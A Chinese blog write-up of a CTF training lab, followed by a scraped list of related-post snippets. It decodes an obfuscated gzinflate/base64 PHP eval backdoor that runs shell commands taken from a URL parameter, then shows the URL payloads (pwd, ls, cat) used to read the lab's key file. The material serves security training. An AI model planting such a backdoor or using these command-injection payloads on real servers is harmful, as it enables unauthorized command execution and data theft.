今天继续给大家介绍CTF通关writeup,本文主要内容是墨者学院 PHP代码分析溯源(第4题)。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、题目简介

今天,我们对墨者学院PHP代码分析溯源(第四题)进行学习,该题目地址为:https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe,打开后页面如下所示:

我们启动该靶场环境,打开后结果如下所示:

二、破解源码

从题目题设来看,我们需要做的第一步就是破解源码,我们先把题目中源代码复制下来,去掉最外层的eval函数后,添加echo函数,并将其复制为本地的PHP文件,文件内容如下所示:

<?php
echo gzinflate(base64_decode("&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&"));
?>

之后,我们搭建好本地PHP环境,然后尝试访问该页面,结果如下所示:

从上图中可以看出,上述源代码在解析后,最外层是一个eval()函数的代码执行函数,而内层使用了反引号将代码执行转化为了命令执行,我们可以使用任意方式提交参数a,作为命令执行的输入。

三、命令执行拿到key

接下来,我们就可以利用a参数来提交命令,进而获得key了。首先,我们先查看当前web系统所在目录,构造payload如下所示:

http://124.70.91.203:45975/f.php?a=pwd

结果如下所示:

从上图中可以看出,当前网页根目录是/var/www/html,之后,我们来查看一下根目录内部有什么文件,构造payload如下所示:

http://124.70.91.203:45975/f.php?a=ls%20/var/www/html

该payload执行后结果如下所示:

在得到根目录下的文件后,我们怀疑key_813517043132.php文件即隐藏着key值,因此,我们尝试打开访问该文件,构造payload如下所示:

http://124.70.91.203:45975/f.php?a=cat%20key_813517043132.php

该payload执行后,结果如下所示:

我们需要打开文件网页源代码,就可以查看到该文件中的key值了。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

墨者学院 PHP代码分析溯源(第4题) 详解相关推荐

  1. 墨者学院-PHP代码分析溯源(第4题)

    PHP代码分析溯源(第4题) 难易程度:★★★ 题目类型:命令执行 使用工具:FireFox浏览器 1.打开靶场,看到一串php代码. 2.使用echo,运行一下代码. <?php echo(g ...

  2. 墨者学院 - WebShell代码分析溯源(第8题)

    审查代码 1.先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2.没有新的发现,就去目录查找,根据最后的修改时间排查. C:\Users\BayernChenTutu\D ...

  3. 墨者学院 - PHP代码分析溯源(第4题)

    打开发现提示key在根目录,且给出代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCA ...

  4. 墨者学院 - PHP代码分析溯源(第2题)

    根据题干看了好久的php隐式转换... 还是毫无头绪... 这样的逻辑几乎是无解的... md5(QNKCDZO,32) = 0e830400451993494058024219903391 根据PH ...

  5. 墨者学院-编辑器漏洞分析溯源(第1题)

    编辑器漏洞分析溯源(第1题) 难易程度:★★ 题目类型:编辑器漏洞 使用工具:FireFox浏览器.burpsuite.菜刀 1.打开靶场,看到提示信息显示fckeditor. 2.首先查看fcked ...

  6. 墨者学院-Bash漏洞分析溯源

    Bash漏洞分析溯源 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器.wwwscan 1.打开靶场,根据题目思路找poc.cgi. 2.使用wwwscan扫一下 发现有目录/cgi ...

  7. 代码分析 | 单细胞转录组数据整合详解

    两种整合方法详解 NGS系列文章包括NGS基础.转录组分析 (Nature重磅综述|关于RNA-seq你想知道的全在这).ChIP-seq分析 (ChIP-seq基本分析流程).单细胞测序分析 (重磅 ...

  8. WebShell代码分析溯源(第1题)墨者学院

    一.访问链接 二.下载系统源码后直接放到D盾里扫描,扫到后门文件 三.查看该木马文件 <?php error_reporting(0); $_GET['POST']($_POST['GET']) ...

  9. 墨者学院 - Bash漏洞分析溯源

    bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulne ...

最新文章

  1. 增强学习(二)----- 马尔可夫决策过程MDP
  2. Odoo(OpenERP)配置文件openerp-server.conf详解
  3. [攻防世界 pwn]——monkey
  4. maven 修改文件名_Maven 构建配置文件
  5. 离散方程式matlab,matlab离散型数据拟合方程,求系数,哪个大神能说说方法
  6. Linux常用命令——rsync
  7. 单应性变换(Homography)
  8. zabbix3.x web设置手册(2)
  9. 计算机关机后耗电问题,笔记本电脑关机后电池还会耗电怎么解决
  10. VBOX下安装RHEL5.4增强工具失败的解决办法
  11. SQL2016发布订阅热备操作手册
  12. 大型分布式电商系统架构技术总结
  13. 计算机三级网络技术考过指南 【历年考点汇总】
  14. 工业B2B电商平台整合延伸工业供应链上下游,打造产业链闭环
  15. 全球智能制造产业联盟落地深圳
  16. 用Html5制作 汤姆猫 小游戏
  17. RSA生成公私钥并加解密
  18. IGMP组播加入失败原因
  19. WMS系统数据库表设计
  20. 模糊神经网络2--基于ANFIS的混沌时间序列预测

热门文章

  1. 无线定位原理:TOA AOA
  2. MAC 编译生成万能播放器
  3. 在 drawable 资源中使用属性引用的兼容问题
  4. 华为鸿蒙开发板-Hi3516DV300硬件设计原理图PCB硬件
  5. 怎样把手机搜索的计算机放到桌面上,我的手机桌面上的软件图标不见了,但软件还在,该怎么把图标找回来?...
  6. 简约精致的目录浏览程序:Files Photo Gallery
  7. python3GUI--轮播图效果展示By:PyQt5(附源码下载地址)
  8. Yaesu FT1XDR写频
  9. Argumentative Essay
  10. 暴风影音说的1m能看720p是骗人的